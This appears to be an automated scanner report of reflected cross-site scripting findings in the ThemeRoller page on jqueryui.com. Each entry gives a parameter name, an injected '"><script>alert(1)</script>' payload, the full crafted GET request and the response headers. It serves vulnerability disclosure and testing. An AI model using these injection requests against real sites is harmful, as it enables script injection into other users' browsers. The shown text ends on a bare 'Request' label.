GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png230d2"><script>alert(1)</script>ddcbe0b8022&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668dd"><script>alert(1)</script>346464947ea was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png668dd"><script>alert(1)</script>346464947ea&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9503"><script>alert(1)</script>a459dcc6533 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngb9503"><script>alert(1)</script>a459dcc6533&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47ff"><script>alert(1)</script>ce132596418 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngb47ff"><script>alert(1)</script>ce132596418&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07fc"><script>alert(1)</script>513a07b8f38 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pnga07fc"><script>alert(1)</script>513a07b8f38&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94c1f"><script>alert(1)</script>2d0e22689aa was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png94c1f"><script>alert(1)</script>2d0e22689aa&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86eda"><script>alert(1)</script>c73d4e689a0 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png86eda"><script>alert(1)</script>c73d4e689a0&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ded2"><script>alert(1)</script>40818f3f47c was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3ded2"><script>alert(1)</script>40818f3f47c&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1acac"><script>alert(1)</script>4c0c01413e6 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1acac"><script>alert(1)</script>4c0c01413e6&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d112"><script>alert(1)</script>4fec38c0b08 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa5d112"><script>alert(1)</script>4fec38c0b08&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f4e"><script>alert(1)</script>5a653707aec was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaae2f4e"><script>alert(1)</script>5a653707aec&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c13a5"><script>alert(1)</script>d8cd7804d63 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c13a5"><script>alert(1)</script>d8cd7804d63&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e33"><script>alert(1)</script>92863e6f3a7 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a57e33"><script>alert(1)</script>92863e6f3a7&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ea6"><script>alert(1)</script>28e30971b21 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
